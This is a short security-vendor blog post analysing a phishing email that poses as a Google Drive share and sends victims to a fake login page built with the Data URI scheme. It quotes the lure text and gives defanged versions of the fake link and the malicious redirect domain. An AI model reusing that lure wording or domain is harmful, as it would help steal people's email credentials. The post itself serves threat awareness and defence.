Google Drive Phish Deploys Data URI Technique

Here’s an interesting mail which arrived in my inbox earlier today. It came from a Gmail address tied to a Google+ account which appears to be Chinese in origin, and had me BCC’d in.

Click to Enlarge

The email is called “Document”, and reads:

I tried to get these document across to you before. Hope you get it now? View it, i uploaded using Google doc and sign on with your email to access. View the document its important. >>

drive(dot)google(dot)com/my-drive/chee(dot)tan

Regards

This might look convincing to the unwary, but a simple hover over the link reveals that this isn’t going to take you to Google Drive:

bashoomal(dot)com/redirect.html

The end-user will be presented with a fake Google Drive login page which asks them to fill in their email address / password.

Click to Enlarge

As you can see from the URL bar, this is another phish that tries to take advantage of the Data URI scheme, which we have previously covered in relation to phishing. The Google account sending the mails appears to have been around since 2007, and also has a Youtube account – it seems likely that it has been compromised, and is being used to further the spread of malicious links. At this point, it’s hard to say if this is a one-off or part of a set but we’ll continue to monitor and update this post accordingly.

ThreatTrack Security Labs is the power behind the malware analysis, detection and remediation technologies developed by ThreatTrack Security. From facilities in the United States and the Philippines, our team of cybersecurity professionals, malware researchers, engineers and software developers work around the clock to discover and combat Advanced Persistent Threats, targeted attacks, Zero-days and other sophisticated malware. The company develops advanced cybersecurity solutions that Expose, Analyze and Eliminate the latest malicious threats, including its ThreatSecure advanced threat detection and remediation platform, ThreatAnalyzer malware behavioral analysis sandbox, ThreatIQ real-time threat intelligence service, and VIPRE business antivirus endpoint protection. Learn more about ThreatTrack Security.